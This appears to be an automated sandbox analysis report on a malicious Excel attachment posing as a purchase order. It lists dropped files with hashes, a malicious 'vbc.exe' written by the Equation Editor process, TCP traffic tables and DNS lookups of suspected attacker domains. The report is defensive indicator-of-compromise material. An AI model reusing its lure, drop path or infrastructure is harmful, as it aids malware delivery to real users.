                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                        Malicious:false
                                        C:\Users\user\AppData\Local\Temp\~DFB1A16108E122F889.TMP
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):512
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                        Malicious:false
                                        C:\Users\user\AppData\Local\Temp\~DFEAB75EE5AC992C85.TMP
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):512
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                        Malicious:false
                                        C:\Users\user\AppData\Local\Temp\~DFFDD773F6984E1177.TMP
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:CDFV2 Encrypted
                                        Category:dropped
                                        Size (bytes):234408
                                        Entropy (8bit):7.970302671615709
                                        Encrypted:false
                                        SSDEEP:3072:hOEg6uY3Uvbl5/SoXWBke9ZRS3gjk5p3JttrLzUT5x65QlxdSrf552fnh6cvrGWh:+aEx5qoXHeBTjw3J7mx65Q/dCfnknUQ
                                        MD5:BC2D171F6EA23A58CE5CCA820869295C
                                        SHA1:DAFD3A3276C12EE6D20206573D65D6FB10E6AF7B
                                        SHA-256:408C41F67CC40208F1518B050DB8B6D0F315DAE817E26C5AE43EFE917506C226
                                        SHA-512:F46D62B6CD47184DB12BD302DEF63E945063E471BBAB3F02483C9C66C83D751E65C97D3F4F4D1D5F4D08BAD1E1FD3BB882F97A85F363945A1659913CE47077B3
                                        Malicious:false
                                        C:\Users\user\Desktop\~$New order - C.S.I No. 04183.xlsx
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):165
                                        Entropy (8bit):1.4377382811115937
                                        Encrypted:false
                                        SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                        MD5:797869BB881CFBCDAC2064F92B26E46F
                                        SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                        SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                        SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                        Malicious:true
                                        Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                        C:\Users\Public\vbc.exe
                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                        Category:dropped
                                        Size (bytes):475934
                                        Entropy (8bit):6.263679071719373
                                        Encrypted:false
                                        SSDEEP:6144:2Gi2L3NWrOG5s3ytYBz5Sy/M3L+uM4jMzfWO/j4zR03bze/XOpSmREM3:hUb5krzwR3LIfL4zq3baOEEz3
                                        MD5:4D1B51FE258BE32D346B3507ABEDDCB3
                                        SHA1:977A34967B0B42A19969DD1106EF74439D306DCE
                                        SHA-256:0C6D57557120DECEDC9A102794EA95BCAF64529EB1F18058E4DF62C34B724988
                                        SHA-512:27330F64606CFEBBE834E2D419E5F34207C1BFBBAE22DA52763C8FE8E48A001D52E2C5AB1B93EE9CFD2E5B4DF02C09628F82BE2CD5D340CA0711C004AED1EC12
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................\...........0.......p....@.......................... ...............................................t.......p..p............................................................................p...............................text...h[.......\.................. ..`.rdata.......p.......`..............@..@.data...X\...........t..............@....ndata...................................rsrc...p....p.......x..............@..@........................................................................................................................................................................................................................................................................................................................................................

                                        Static File Info

                                        General

                                        File type:CDFV2 Encrypted
                                        Entropy (8bit):7.970302671615709
                                        TrID:
                                        • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                        File name:New order - C.S.I No. 04183.xlsx
                                        File size:234408
                                        MD5:bc2d171f6ea23a58ce5cca820869295c
                                        SHA1:dafd3a3276c12ee6d20206573d65d6fb10e6af7b
                                        SHA256:408c41f67cc40208f1518b050db8b6d0f315dae817e26c5ae43efe917506c226
                                        SHA512:f46d62b6cd47184db12bd302def63e945063e471bbab3f02483c9c66c83d751e65c97d3f4f4d1d5f4d08bad1e1fd3bb882f97a85f363945a1659913ce47077b3
                                        SSDEEP:3072:hOEg6uY3Uvbl5/SoXWBke9ZRS3gjk5p3JttrLzUT5x65QlxdSrf552fnh6cvrGWh:+aEx5qoXHeBTjw3J7mx65Q/dCfnknUQ

                                        File Icon

                                        Icon Hash:e4e2aa8aa4b4bcb4

                                        Network Behavior

                                        Snort IDS Alerts

                                        Timestamp:11/25/21-19:25:03.131291
                                        Protocol:TCP
                                        SID:1201
                                        Message:ATTACK-RESPONSES 403 Forbidden
                                        Source Port:80
                                        Dest Port:49168
                                        Source IP:34.246.239.131
                                        Dest IP:192.168.2.22

                                        Network Port Distribution

                                        TCP Packets

                                        Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                        Nov 25, 2021 19:23:24.989027977 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.989069939 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.989111900 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.989550114 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.989590883 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.989603043 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.989628077 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.989628077 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.989667892 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.989676952 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.989706039 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.989715099 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.989742994 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.989752054 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.989782095 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.989788055 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.989820957 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.989833117 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.989855051 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.989857912 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.989897966 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.989902973 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.989938021 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.989947081 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.989974022 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.989983082 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.990017891 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.992316008 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.992512941 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.992561102 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.993403912 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.993444920 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.993451118 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.993484020 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.993485928 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.993520021 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.993530035 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.993558884 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.993566036 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.993597984 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.993608952 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.993637085 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.993647099 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.993675947 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.993678093 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.993711948 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.993715048 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.993751049 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.993751049 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.993789911 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.993791103 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.993822098 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.993825912 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.993864059 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.993865013 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.993904114 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.993906975 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.993942976 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.993944883 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.993982077 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.993983984 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.994018078 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.994020939 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.994055986 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.994060993 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.994096041 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.994096994 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.994133949 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.994138002 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.994170904 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.994174004 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.994208097 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.994211912 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.994246960 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.994249105 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.994285107 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.994288921 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.994322062 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.994360924 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.994379997 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.994384050 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.994395971 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.994399071 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.994436026 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.994438887 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.994472980 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.994472980 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.994513035 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.995444059 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.996992111 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.279172897 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.279217958 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.279258013 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.279284000 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.279443979 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.279474974 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.279496908 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.279501915 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.279515982 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.279529095 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.279556036 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.279557943 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.279582024 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.279583931 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.279601097 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.279622078 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.279875040 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.279918909 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.279931068 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.279958963 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.279973030 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.279987097 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.279999018 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.280041933 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.280734062 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.280765057 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.280805111 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.280819893 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.280824900 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.280884027 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.280893087 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.280934095 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.280949116 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.280971050 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.280988932 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.281019926 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.281033993 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.281048059 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.281055927 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.281073093 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.281090975 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.281100988 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.281114101 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.281128883 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.281133890 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.281155109 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.281169891 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.281181097 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.281207085 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.281208992 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.281223059 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.281233072 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.281244993 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.281259060 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.281266928 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.281286001 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.281301975 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.281313896 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.281322956 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.281341076 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.281354904 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.281367064 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.281374931 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.281394005 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.281419992 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.281419992 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.281441927 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.281446934 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.281462908 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.281474113 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.281486034 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.281519890 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.283430099 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.284014940 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.284053087 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.284075975 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.284095049 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.285425901 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.285464048 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.285469055 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.285504103 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.285686970 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.285721064 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.285732031 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.285756111 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.285761118 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.285790920 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.285804033 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.285826921 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.285830975 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.285864115 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.285866976 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.285900116 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.285903931 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.285936117 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.285937071 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.285972118 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.285974979 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286005974 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286006927 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286041021 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286051035 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286077976 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286086082 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286115885 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286127090 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286151886 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286156893 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286185980 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286190033 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286221027 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286223888 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286256075 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286263943 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286288977 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286298037 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286324024 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286334038 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286359072 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286367893 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286395073 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286400080 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286431074 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286441088 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286465883 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286475897 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286501884 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286506891 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286537886 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286540031 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286571026 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286578894 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286606073 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286607027 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286640882 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286643028 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286675930 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286676884 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286711931 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286712885 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286745071 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286755085 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286780119 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286782026 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286814928 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286815882 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286848068 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286851883 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286881924 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286883116 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286916971 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286919117 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286952019 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286955118 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286987066 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286989927 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.287024975 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.287144899 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.287178993 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.287189007 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.287219048 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.287226915 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.287264109 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.287269115 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.287298918 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.287302017 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.287333012 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.287338018 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.287368059 CET8049165103.171.1.140192.168.2.22

                                        UDP Packets

                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                        Nov 25, 2021 19:24:41.533070087 CET | 52167 | 53 | 192.168.2.22 | 8.8.8.8
                                        Nov 25, 2021 19:24:41.570363998 CET | 53 | 52167 | 8.8.8.8 | 192.168.2.22
                                        Nov 25, 2021 19:25:02.965919971 CET | 50591 | 53 | 192.168.2.22 | 8.8.8.8
                                        Nov 25, 2021 19:25:03.035269022 CET | 53 | 50591 | 8.8.8.8 | 192.168.2.22

                                        DNS Queries

                                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                        Nov 25, 2021 19:24:41.533070087 CET | 192.168.2.22 | 8.8.8.8 | 0x8eb8 | Standard query (0) | www.oojry.xyz | A (IP address) | IN (0x0001)
                                        Nov 25, 2021 19:25:02.965919971 CET | 192.168.2.22 | 8.8.8.8 | 0xc18c | Standard query (0) | www.crystalsbyzoe.com | A (IP address) | IN (0x0001)

                                        DNS Answers

